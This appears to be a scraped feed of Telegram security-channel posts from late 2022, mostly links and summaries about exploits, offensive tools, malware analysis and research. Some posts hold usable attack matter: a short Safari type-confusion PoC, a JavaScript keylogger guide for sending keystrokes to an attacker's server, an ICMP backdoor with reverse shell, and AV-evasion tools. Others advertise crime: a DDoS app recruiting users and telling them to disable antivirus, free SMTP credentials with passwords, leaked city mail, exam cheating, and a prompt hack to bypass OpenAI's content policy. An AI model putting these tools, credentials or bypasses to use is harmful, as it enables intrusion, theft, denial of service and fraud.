Burp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)
2022-12-22 16:02:35
MSI Shenanigans
This repository contains Proof of Concept code and harmless weaponised packages representing various weaponisation strategies that Threat Actors abuse in Windows Installer MSI format.
Shenanigans. Part 1 – Offensive Capabilities Overview:
2022-12-22 16:02:34
plution
Prototype pollution scanner using headless chrome
2022-12-22 16:01:37
SquarePhish
SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.
2022-12-22 16:01:36
Copilot, for your terminal
A CLI tool that generates shell scripts from a human readable description.
2022-12-22 14:38:34
chatgpt_chinese_prompt_hack
Use prompt hack to bypass OpenAI's content policy restrictions by golfzert
2022-12-22 14:09:01
2022-12-22 05:51:16
#exploit
1. CVE-2022-48870: maccms admin+ xss attacks
2. CVE-2022-39253: Docker host file read
2022-12-22 05:51:15
#WebApp_Security
Web Attack Cheat Sheet
2022-12-22 05:51:14
#Offensive_security
Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk, plus functions and strings obfuscation, duplicate lsass handle from existing processes
2022-12-21 17:24:04
2022-12-21 15:28:02
#exploit
1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521: Remote DoS in Linux kernel WILC1000 wireless driver
2. CVE-2022-2602: io_uring kernel exploit
3. Directory Traversal Vulnerability in Huawei HG255s Products
2022-12-21 15:28:01
#Threat_Research #Cloud_Security
1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
2. Elastic IP Hijacking - A New Attack Vector in AWS
2022-12-21 15:27:46
#Blue_Team_Techniques
Incident Response Methodologies 2022 EN/ES/FR/RU Versions
2022-12-21 15:27:45
#Analytics
Top 10 most exploited vulnerabilities in 2022
1. CVE-2022-30190: MS Office "Follina"
2. CVE-2021-44228: Apache Log4Shell
3. CVE-2022-22965: Spring4Shell
4. CVE-2022-1388: F5 BIG-IP
5. CVE-2022-0609: Google Chrome zero-day
6. CVE-2017-11882: Old but not forgotten - MS Office bug
7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell
8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs
9. CVE-2022-26134: Atlassian Confluence RCE flaw
10. CVE-2022-30525: Zyxel RCE vulnerability
2022-12-21 14:46:53
2022-12-21 13:45:30
💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
CrowdStrike recently discovered a new exploit method (called OWASSRF) consisting of CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by Microsoft in response to ProxyNotShell.
After initial access via this new exploit method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access, and performed anti-forensics techniques on the Microsoft Exchange server in an attempt to hide their activity.
2022-12-21 13:45:29
💥Home Grown Red Team: Let’s Make Some Malware In C: Part 3
This post is going to be all about the dll!
2022-12-21 13:45:25
🔥CVE-2022-2602 Exploit using inode locking technique.
📕DirtyCred: Escalating Privilege in Linux Kernel
🔖Blog posts:
- DirtyCred Remastered: how to turn an UAF into Privilege Escalation
- CVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF
2022-12-21 13:45:15
|CVE-2022-2602 Kernel Exploit|
🔥The vulnerability is a UAF that impacts the registered file descriptor functionality in the io_uring subsystem. It's possible to register a file in the io_uring context, free it from the Unix Garbage Collector (GC) and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replacing the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieving good timing with a small race window.
2022-12-21 13:45:14
🔥Deconstructing and Exploiting CVE-2020-6418 (exploit here)
This vulnerability lies in the V8 engine of Google Chrome, namely its optimizing compiler Turbofan. Specifically, the vulnerable version is in Google Chrome’s V8 prior to 80.0.3987.122. In this article, Daniel Toh Jing En will give a step-by-step analysis of the vulnerability, from the root cause to exploitation.
2022-12-21 13:45:12
|FORCEDENTRY, are you there?|
🕵️‍♂️I think many have not forgotten FORCEDENTRY, the data-only 0-click RCE exploit delivered via iMessage by NSO Group that made a lot of noise a year ago (CVE-2021-30860, an integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming a JBIG2 weird machine in the parser), which essentially belongs to CoreGraphics). That is, a PDF file arrives that claims to be a ".gif", and because IMTranscoderAgent analyzed exactly this kind of impostor outside the BlastDoor sandbox, the Israelis could achieve SBX. In reality the exploitation was much more complicated, and you can read more: on the channel, here and here.
Moreover, researchers from Google Project Zero were unable to establish the exact trail after the IMTranscoderAgent SBX and, as an assumption, put forward several exploitation scenarios:
1️⃣ iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣ iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
The problem for security practitioners to this day is that there are still no samples publicly available (from which we can conclude that detection with standard methods will not work). Matt's post, in addition to analyzing the attack, discusses detection without using regular expressions or process-name checks, and in the end presents a tool (ELEGANTBOUNCER) for analyzing files of the non-fileless (data-only) attack without relying on samples.
🔖You can read more in Matt's article.
#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-21 13:44:10
💥In-Memory Execution in macOS: the Old and the New
As part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.
In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.
2022-12-20 14:41:31
2022-12-20 07:07:12
2022-12-20 06:47:15
2022-12-20 06:32:26
2022-12-20 05:02:57
🔥Linux Kernel: Exploiting a Netfilter UAF in kmalloc-cg
We describe a method to exploit a UAF in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
2022-12-20 05:02:33
🔥🔥🔥Type confusion vulnerability (CVE-2022-42823) exists in the Apple Safari JSC Inspector (Root Cause Analysis + PoC).
A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.
PoC:
<script>
  let object = {};
  Object.prototype.__defineSetter__('type', function() {
    object.x = {};
    object[0] = object.x;
  });
</script>
🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.
2022-12-20 04:54:25
ZoneAlarmEoP
Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV
2022-12-20 03:11:03
#Red_Team_Tactics
1. Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
2. Raw sockets hacking -> Secure shell using port Knocking technique with AES256-GCM
2022-12-20 03:11:02
#tools #Offensive_security
1. Shennina - Automating Host Exploitation with AI
2. AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscation
2022-12-20 03:11:01
#Infographics
"VT Intelligence Cheat Sheet", 2022.
2022-12-20 03:10:59
#Analytics #Malware_analysis
1. Ransomware Business Models: Future Pivots and Trends
2. SentinelSneak: Malicious PyPI module poses as security software development kit
2022-12-19 17:58:10
Heartbleed vulnerability exploited🩸▪️ #github #soft #Heartbleed
2022-12-19 17:58:09
CrimeFlare - This tool can help you to see the real IP behind CloudFlare protected websites.
2022-12-19 17:56:52
🟥10k🔠 non stop Post uploading soon this Last month Happy💻 cyber security intelligent 💻
2022-12-19 17:37:56
2022-12-19 17:37:55
2022-12-19 17:37:54
2022-12-19 17:32:03
Wi-Fi SurveyorVisualize Wi-Fi signal strength over a geographic area.
2022-12-19 17:20:19
#Threat_Research
EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)
2022-12-19 16:35:24
|Exploit Notes|
📑Exploit Notes github repo
Sticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTF.
💾File Upload Attack
💾Java Pentesting
💾RE with Rizin
💾Android Pentesting
💾Pug Pentesting
💾PE Analysis
💾RE
💾IMINT and GEOINT
💾32-bit ARM Assembly
💾OSINT
💾x86 Assembly
💾Malware Analysis
💾BOF Attack
2022-12-19 16:35:03
🔥🔥🔥MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
This blog post describes a vulnerability found and exploited in November 2022 by NCC Group. The target was the TP-Link AX1800 WiFi 6 Router (Archer AX21). It was running hardware version 3.6 and firmware version 1.1.1 (Archer AX21(US)_V3.6_1.1.1 Build 20220603). The vulnerability was patched on 2nd of December 2022 with firmware version 1.1.3 (Archer AX21(US)_V3.6_1.1.3 Build 20221125).
2022-12-19 16:34:34
|Offensive Security Cheatsheet|
Document used to centralize much information about cybersecurity techniques and payloads.
💾OSINT
💾Web Pentest
💾Network
💾Shells methods
💾Windows Systems
💾Linux Systems
💾Other Systems
💾Passcracking Hash & Files
💾Phishing, RedTeam and SE
💾Wireless
💾Cryptography
💾Pwn
💾Defensive, Monitoring, CTI...
💾External Resources
2022-12-19 16:33:24
🔥Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.
2022-12-19 16:06:54
BlueTeam.Lab
This project contains a set of Terraform and Ansible scripts to create an orchestrated BlueTeam Lab. The goal of this project is to provide the red and blue teams with the ability to deploy an ad-hoc detection lab to test various attacks and forensic artifacts on the latest Windows environment and then to get a 'SOC-like' view into generated data.
#techniques #cybersecurity #infosec
2022-12-19 14:12:22
2022-12-19 10:18:19
Application Security Engineer, Bank
Salary: 130-200 thousand rubles net
Location: Moscow, Krasnodar
Work format: remote/office
What you will be doing:
- Implementation, configuration and support of WAF, responding to attacks;
- Security analysis of the software under development and its architecture, identifying vulnerabilities;
- Defining security requirements in the Bank's project activities;
- Monitoring the remediation of discovered vulnerabilities.
What we expect from the candidate:
- Experience configuring and deploying web application firewall (WAF) class systems;
- Knowledge and understanding of the OWASP Top 10 and of applicable methodologies, standards and practices in secure development;
- Understanding of how modern web applications work (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, etc.);
- Knowledge of Linux at the administrator level;
- Understanding of the principles of protecting web applications and the ability to fix discovered vulnerabilities at the architectural level.
A big plus:
- Knowledge of SQL, basic skills with various DBMSs;
- Basic programming skills in any language (python, php, go, etc.).
Contact: @alya_988
2022-12-19 05:28:33
💥Ban-R•Features:~Reports Time Delay To Secure Your Acc~Temp Ban & Permanent Ban ~Fully Safe & Accessible~Works Without Proxies ~Anti Virtual Machine •Use 2013 Insta Accounts For Fast BanningDownload Link: Click Here 👈Password: #CyberRatsBanRBy Cyber_Rats ❤️
2022-12-19 03:09:18
#tools #Offensive_security
1. Venom - library that is meant to perform evasive communication using stolen browser socket
2. Pingoor - Linux Backdoor based on ICMP protocol
2022-12-19 03:09:17
#Malware_analysis
1. Munin - Online hash checker for Virustotal and other services
2. Hunting for Attestation Signed Malware
2022-12-18 14:32:32
2022-12-18 13:39:14
🔥Venom is a C++ library that is meant to give an alternative way to communicate: instead of creating a socket that could be traced back to the process, it creates a new "hidden" (there is no window shown) detached Edge process (Edge was chosen because it is a browser that is installed on every Windows 10+ and won't raise suspicion) and steals one of its sockets to perform the network operations.
The benefit of creating a detached browser process is that there is no danger that it will be closed accidentally by the user, and the sockets exist but are not communicating with any site, therefore avoiding possible collisions.
2022-12-18 13:02:21
#tools #Offensive_security
1. A simple ptrace-less shared library injector for x64 Linux
2. EDRs Hooked APIs
2022-12-18 10:59:51
#exploit
1. CVE-2022-41050: A vulnerability in the MS Windows' User-Mode Printer Drivers
2. CVE-2022-46689: macOS Dirty Cow bug
2022-12-18 10:59:50
#Research
"First, Do No Harm: Studying the manipulation of security headers in browser extensions", 2021.
-> Fast JavaScript parser
2022-12-18 10:59:49
#Malware_analysis
1. VidarStealer analysis
2. Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC/Cobalt Strike
2022-12-18 09:26:11
Linux Hacking ToolsNessus– this tool can be used for Ubuntu hack, scan configuration settings, patches, and networks etc. it can be found at This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at above list is not exhaustive; it gives you an idea of the tools available for Ubuntu hacking and hacking Linux systems.
2022-12-18 03:01:24
💉linux_injector is a simple ptrace-less shared library injector for x64 Linux (most Linuxes that use glibc should be supported).
For control flow hijacking, this program needs a hijacking candidate. The code presented here uses malloc(), this can be changed by editing FUN_NAME and recompiling. Make sure the hooked function can run under 100ms, so that it won't be overwritten while it executes. This means calls like sleep or wait are bad candidates for the initial shellcode. The function in question also needs to be more than 0x50 long for the shellcode not to overwrite other functions.
Usage:
linux_injector <pid> <module>
Where pid is the target process id and module is a module to inject, which will be dlopened in the remote process.
⚠️The code expects that the target uses the same libc as available to us. If it does not, then the remote symbols won't be found. This could be fixed by reading the remote libraries and scanning for our symbols in them.
2022-12-18 03:01:23
💥MacDirtyCowDemo#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-17 16:29:16
New mini shell :)⚠️ Bypass All waf📌 Non Encoded :::)))
2022-12-17 15:45:08
⚠️Anyone who wants cyber security intelligent program hacking  related post can make me admin on their channel or group.  Post uploading will be done only in the channel group above 500 over subscribers. ⚠️ @hayper007 ⚠️
2022-12-17 13:18:13
2022-12-17 05:17:05
#Threat_Research
1. Unusual Cache Poisoning between Akamai and S3 buckets
2. HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
2022-12-17 05:17:04
#exploit
1. CVE-2022-28672: Foxit PDF Reader - UaF RCE Exploit
2. CVE-2022-45451: Acronis Cyber Protect/Home Cyber Protect - Arbitrary File Read
2022-12-17 02:35:20
2022-12-17 02:27:11
🔥PingPlant is a Linux implant PoC that starts a custom listener for ICMP data, and parses the ethernet frame to check for a special payload. If this payload is found, it will then initiate a callback to a defined IP. Even though I have this connect back with a reverse shell, you could edit this to have it execute anything on the infected system when the special payload is received.
Features:
💾Runtime process renaming
💾No listening ports
💾Written in Go, so almost all AV's will never pick this up
2022-12-17 02:27:10
🔥Win32k User-Mode Printer Drivers StartDoc UAF (PoC included)
A vulnerability (CVE-2022-41050) in the way BoundClipRGNToSurface merges surfaces allows attackers to trigger a UAF due to a function that frees the used data and then access it. If the memory where the freed memory is properly prepared, the attacker can control the crash and cause it to execute arbitrary code.
2022-12-17 02:27:09
🛡Akamai’s Perspective on December’s Patch Tuesday 2022
In this report, we’ll assess how critical the vulnerabilities really are and how commonplace the affected applications and services are, and we’ll provide a realistic perspective on the bugs that were fixed.
🛡December 2022 Patch Tuesday: 10 Critical CVEs, One Zero-Day, One Under Active Attack (crowdstrike)
🛡Microsoft Patch Tuesday for December 2022 — Snort rules and prominent vulnerabilities (talos intelligence)
🛡The December 2022 Security Update Review (ZDI)
🛡Microsoft’s December 2022 Patch Tuesday Addresses 48 CVEs (tenable)
🛡Microsoft Patch Tuesday, December 2022 Edition (KrebsonSecurity)
🛡Patch Tuesday - December 2022 (rapid7)
2022-12-16 15:05:00
2022-12-16 13:45:20
This tool was presented at Source Zero Con 2022. In short: you give it a compiled binary, and the tool removes known IoC strings from the binary, signs it with a certificate from another binary, and also helps to bypass EDR (by increasing the file size) #pentest #bypass
2022-12-16 13:45:19
🔥String Obfuscation The Malware Way - blog post
While this technique is not as secure as encryption, it can still be useful for malware authors who want to avoid detection by simple string analysis and other static analysis techniques. Not encrypting or encoding the strings will also help avoid entropy-based detections.
💥MurkyStrings is a string obfuscator for .NET applications, built to evade static string analysis. It does not rely on encryption or encoding to evade entropy-based detections. Instead, it transforms strings into a murky mess by inserting special characters and random words. Removing them again on runtime.
Usage:
MurkyStrings.exe <file path> [--mode=<mode>]
Available modes:
💾replace[glyph] - Insert a variety of homoglyph characters that look identical to alphabetical characters
💾replace[simple] - Insert random amounts of a special character in between all actual characters
💾combine[glyph] - Combines remove and replace[glyph]
💾combine[simple] - Combines remove and replace[simple]
2022-12-16 13:45:15
🔓Defeating Windows ASLR via low-entropy shared libraries in 2 hours
As it was demonstrated in this article, ASLR implementation on Windows has important nuances and in some situation can introduce additional risk for an application, especially if the target is a 32-bit program or it is linked with a library which was compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. While the best solution would be to have per-execution randomization as it is done in Linux and modern MacOS, the good decision would be to move away from 32-bit to 64-bit applications and avoid linkage with shared libraries compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. This would help to significantly increase complexity of an attack.
2022-12-16 13:45:14
⌨️Javascript Keylogger can come handy in case you are able to access only DOM/JS of a website and want to get naughty.Usage:💾change url variable in keylogger.js to url address where keylogger.php is located💾load keylogger.js in the DOM of the attacked application💾put keylogger.php and data.txt to your server where you have data write access (don't forget to set pertinent file privileges).💥Profit! You're done, just let the victim come to attacked website with JS allowed in the browser and type something.
2022-12-16 13:45:12
🔥CVE-2021-43444 to 43449: Exploiting ONLYOFFICE Web Sockets for Unauthenticated RCE.
2022-12-16 13:45:11
🔥🔥🔥Foxit PDF Reader UAF RCE Exploit JIT Spraying (CVE-2022-28672) - blog post.
This research shows that if Foxit Reader had been compiled with CFG support, the discovered bug would have been more difficult to exploit. However, the lack of CFG support allowed the attacker to use JIT spraying to bypass existing mitigations such as ASLR and DEP. This highlights the importance of using multiple layers of defense to protect against attacks.
💥PoC Exploit
📺Demo: Foxit PDF Reader RCE Demo - CVE-2022-28672
2022-12-16 11:19:40
2022-12-16 08:06:07
🌐 Cooprudea.comip, ip_long, user_login, user_id, stamp, activity, session_id, country, details, ac_bot, ac_status, ac_by_user email_to, subject, content, sender_name, sender_email, debug_mode, debugging_output, timestamp, status📣
2022-12-16 05:26:08
#Infographics #Offensive_security
DACLs (Active Directory Discretionary Access Control Lists) abuse
2022-12-16 05:26:07
#tools #Red_Team_Tactics
1. Talon - password guessing tool that targets the Kerberos/LDAP services within the Windows AD environment
2. Bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack
3. Tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs
2022-12-16 05:26:06
#cryptography
Comparison of Symmetric Encryption Methods
2022-12-16 05:26:05
#tools #Offensive_security
1. udhcpc process crash on BusyBox 1.24.2
2. Signing-key abuse and update exploitation framework
3. A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods
2022-12-16 05:26:04
#exploit
1. CVE-2022-45771: Pwndoc LFI to RCE
2. Discord Image Token Password Grabber Exploit
2022-12-16 05:25:13
#reversing #IoT_Security
How to Identify a Microcontroller Model Using Firmware Analysis
2022-12-15 16:06:51
🔥Windows Contacts (examples of using the Windows Contact API) RCE vuln (CVE-2022-44666)
⚠️The problem (this vulnerability does not fully cover the problem) has not been completely fixed, so the details, in the form of a write-up from Microsoft, have been postponed indefinitely!
2022-12-15 16:06:30
🔥You’ve Crossed the Line — Disturbing a Host’s Rest
Akamai Security Research dove deeply into MS-RPC research this past year. For a protocol that does so much, MS-RPC is largely under-researched, and it can have real-world effects. One of those effects is that vulnerabilities in an RPC interface become exposed. This is what we are focusing on in this blog post: vulnerabilities within the Local Session Manager (LSM) RPC interface.
🔥cve-2022-37973 PoC Exploit
🔥cve-2022-37998 PoC Exploit
🧰RPC Toolkit (set of tools, articles, blog posts and links to help security researchers drive their RPC research)
2022-12-15 16:06:09
🔥Dragnmove is a post-exploitation tool that infects files shared between users in order to move from one system to another. Dragnmove can detect actions like dropping a file into the browser window or attaching a file to an email client. After Dragnmove detects the action, it hooks CreateFile API calls to modify handles.
2022-12-15 15:02:52
2022-12-15 15:02:12
Free SMTP Anil$ Wisecow! Gsw28844$ Fatala1
2022-12-15 14:54:23
50 SMTP free Join VIP now $35 get smtp everyday. SMTP Stock 800+
2022-12-15 13:19:20
71 Python Projects with reference and source code.
2022-12-15 11:27:20
Get ready :)
2022-12-15 10:35:44
2022-12-15 03:19:46
We finish the hit parade of small towns with the Burshtyn City Council. As usual, the archive contains mail. Databases coming soon. Honestly
2022-12-15 02:23:58
Sim available without proof all sim reacharged 500/rs 1sim vodafone +91+ delivery charges600/rs 1sim jio +91+ delivery charges35sim Stock available 100% trusted escrow accepted@hayper007
2022-12-14 15:39:13
#Research
"DISTDET: A Cost-Effective Distributed Cyber Threat Detection System", 2022.
2022-12-14 15:39:04
#tools #Offensive_security
1. Nightly builds of common C# offensive tools
2. Nemo - An offensive Remote Access Tool & Post-Exploitation Framework
2022-12-14 15:39:03
#Fuzzing
1. Fuzzing ping(8)… and finding a 24 year old bug
2. Finding JIT Optimizer Bugs using SMT Solvers and Fuzzing
3. Fuzzing the Shield: CVE-2022-24548
2022-12-14 15:25:50
2022-12-14 15:01:23
2022-12-14 09:09:17
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2022-12-14 04:50:52
🇮🇷 Iranian rap about corrupt actors who are in the position of spiesBased on observations in Iran, there are actors who are willing to sell their homeland for money and spy for other countries.This issue has made the people of Iran very angry with some famous actors.It is expected that the Iranian government will take care of the request of its people and deal seriously with these spies.via "shabzadeh".#Celebrity_2zari #Green_card #Iranian_rap@YourJiniNews
2022-12-14 03:26:31
⚡️disBalancer App FAQ
What is happening⁉️
We target Russian propaganda websites and sources that contribute to the Russian invasion of Ukraine. We want to make all the murders and violence caused by Russian military forces STOP. Troops are washing their hands in blood, killing the Ukrainians, both children and civilians. PLEASE, SHARE THE LINK ON THE APP AND LET’S #stopPutin TOGETHER!
THE MORE PEOPLE RUN THE APP, THE MORE EFFECTIVE ATTACKS ARE!
How to use the app
⚫️ Download the file via
⚫️ Unzip it
⚫️ Open the disBalancer app and click RUN
That's it! You're in the cyber army 💪🏼
Update! ‼️
We are upgrading server (more resources = more people involved), if you will receive 500 error message or heartbeat error - don't worry, your soft still attacking and working!
Minimal system requirements
1) To run the application you need to have a .Net runtime version 4.5.2+ (higher version as 4.8 also would fit) If you have problems with restart, the last package Microsoft Visual C++ 2015 2019 Redistributable (x64 x86) will solve it.
it possible to use the App on Mac OS or Linux?
Our application is currently launched for Windows. Apps for other OS are on the way and will be announced soon. You can install and run the app on Mac OS and Linux using Boot Camp, VMWare, or Parallels Fusion.
Antivirus exclusions
To avoid any runtime problems until the app will be signed: Add the application folder to your antivirus exclusions to avoid blocking task execution, as some antiviruses could detect it as a hacker tool. Adding an application to the firewall exception would be also a good idea. The app isn’t server-based, it’s a simple client, so you don’t need to be aware of the hacking of the exposed web interface and host.
Can I use VPN?
It’s not required to use VPN to run the app but you can use it to provide your data encryption.
VPN services are recommended: https://hackenvpn.com https://
to do if the error occurs?
Be sure you have installed all required software described in minimal system requirements. In case of any issues with the application, please write #Error in the chat and attach the information.log file. It’s a file located near Disbalancer.exe.
How do we know what targets we have?
We don’t disclose targets until downtime. Targets that are currently under attack are hidden due to security purposes. After a website is in downtime, we send an inactive link to the disBalancer chat.
Can I see the code?
Unfortunately, we haven't done that yet due to the beta testing period. There are some things that we can't publish at all as well. For instance, hidden attack mechanics and algorithms, transfer batching, and time synchronization that make it possible to function normally.
Can I share websites to make them unusable?
Sure! Just send a link to it on our Telegram chat and add the hashtag #NewTarget.
disBalancer UKRAINE 🇺🇦
Since this chat was created for an English-speaking audience, we ask all Ukrainians to go to this chat for comfortable communication for everyone.
Instruction in Ukrainian:
2022-12-13 14:52:51
2022-12-13 03:12:41
#Infographics #Infosec_Standards Types of VPN ]-> RFC4026: "Provider Provisioned VPN Terminology", 2018.
2022-12-13 03:12:38
#reversing #Research BlackHat Europe 2022: "Exploring a New Class of Kernel Exploit Primitive".
2022-12-13 03:12:37
#exploit
1. CVE-2022-45025: Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)
2. Exploring Chrome’s CVE-2020-6418
3. CVE-2022-39066: SQL Injection Vulnerability in ZTE MF286R
2022-12-13 03:12:36
#exploit
1. ThinkPHP latest RCE reproduction and analysis
2. Follina, Shadow Credentials, and WSUS exploitation
3. CVE-2022-1361: Improper Neutralization of Special Elements Used In a SQL Command: New Technique Discovered To Bypass WAF Of Several Vendors
2022-12-13 03:12:35
#Offensive_security
1. A collection of various and sundry code snippets that leverage .NET dynamic tradecraft
2. Payload generator to exfiltrate user cookies through the PHP info page bypassing the HttpOnly flag during XSS exploitation
3. From SQL Injection to RCE on Intel DCM (CVE-2022-21225)
2022-12-13 03:12:34
#compilers Codon - high-performance, zero-overhead, extensible Python compiler using LLVM
2022-12-13 03:12:33
#Red_Team_Tactics 1. StealthHook - A method for hooking a function without modifying memory protection Frida script to bypass common methods of sslpining Android pipe_buffer arbitrary read write
2022-12-13 03:12:32
#exploit
1. Exploiting CVE-2022-42703 - Bringing back the stack attack
2. CVE-2022-36537: ZK Framework - Exposure of Sensitive Information to an Unauthorized Actor
2022-12-12 14:41:29
2022-12-12 13:06:08
Fuzzing ping(8)… and finding a 24 year old bug. December 11, 2022 at 09:57AM by Gallus via reddit
2022-12-06 03:04:38
#hardening "Hardening with Scapolite: a DevOps-based Approach for Improved Authoring and Testing of Security-Configuration Guides in Large Scale Organizations", 2022.
2022-12-06 03:04:37
#Tech_book "Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence", 2022.
2022-12-06 03:04:36
#reversing "Exploiting Branch Target Injection", 2021.
2022-12-06 03:04:18
#Malware_analysis Anti-Reversing Techniques Part 1: 2:
2022-12-06 03:04:17
#Tech_book "Black Hat Python: Python Programming for Hackers and Pentesters, 2nd Edition", 2021. ]-> Python 3 Source Code:
2022-12-06 03:04:16
#Threat_Research #Blue_Team_Techniques
1. Threatest - CLI and Go framework for end-to-end testing threat detection rules
2. Detect Tactics, Techniques & Combat Threats
2022-12-06 03:04:15
#Malware_analysis
1. ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware
2. Blowing Cobalt Strike Out of the Water With Memory Analysis
2022-12-05 20:33:20
#Research "HearMeOut: Detecting Voice Phishing Activities in Android", 2022. ]-> Voice phishing behavior detection system in AOSP:
2022-12-05 20:32:11
2022-12-05 09:22:56
2022-12-05 08:26:31
Titan: A generic user defined reflective DLL for Cobalt Strike
simple PoC to invoke an encrypted shellcode by using a hidden call
is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques
small wiper malware programmed in c#
new target domains using Content Security Policy
is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team
collect assets and automatically perform SQL injection detection (plug-in automatic Bypass), XSS detection, RCE detection, and sensitive information detection
Extract the login log on the domain controller or remotely, and quickly obtain the IP address corresponding to the domain user
a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis!
is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing
2022-12-05 08:25:45
Shennina Automating Host Exploitation with AI
A care package of useful bofs for red team engagements
is a forked and enhanced version of TinyCheck. SpyGuard's main objective is to detect signs of compromise by monitoring network flows transmitted by a device
2022-12-03 17:06:53
⚜ List of Websites Giving free RDP/VPS ⚜
2022-12-03 13:13:17
2FA Bypass by @hackerscrolls
2022-12-02 21:53:44
2022-12-02 21:53:43
2022-12-01 18:59:00
#Research "Backporting Security Patches of Web Applications: A Prototype Design and Implementation on Injection Vulnerability Patches", 2022.
2022-12-01 18:58:57
#Fuzzing "SnapFuzz: An Efficient Fuzzing Framework for Network Applications", 2022. ]->
2022-12-01 18:58:56
#Malware_analysis
1. New details on commercial spyware vendor Variston
2. HiveV5 file decryptor PoC
2022-12-01 18:56:41
#Cloud_Security A Detailed Talk about K8S Cluster Security from the Perspective of Attackers Part 1: 2:
2022-12-01 18:56:40
#Blue_Team_Techniques Get-InjectedThreadEx - Detecting Thread Creation Trampolines ]-> PowerShell detection script:
2022-12-01 18:56:39
#reversing Guide to Reversing and Exploiting iOS binaries Part 3 - Heap Overflows on iOS ARM64: Spraying, UAF ]-> Part 1, 2:
2022-12-01 18:56:38
#tools #OSINT CVE and PoC SearchBot v.0.3.5:
- search and monitoring of new CVE;
- search and monitoring of PoCs.
2022-12-01 18:56:37
#tools #Sec_code_review Heap_detective - detect heap memory pitfalls in C++/C
2022-12-01 18:56:35
#DFIR Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware
2022-12-01 13:16:15
Bypassing Web Application Firewalls. December 01, 2022 at 04:51PM by ma-ni via reddit
2022-12-01 07:23:46
Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntu. December 01, 2022 at 07:23AM by Gallus via reddit
2022-12-01 01:59:31
Exploiting an N-day vBulletin PHP Object Injection Vulnerability #APTIran
2022-11-30 15:36:19
📕A Journey To Pwn And Own The Sonos One Speaker
2022-11-30 15:35:37
💥USA's Military Empire: A Visual Database
US military bases are sprawled across many parts of the Earth, and that is no secret to anyone; the visual database will help to grasp visually the scale of the intervention of the omnipresent "American dream" of "crapocracy". #наЗлобуДня
2022-11-30 15:35:21
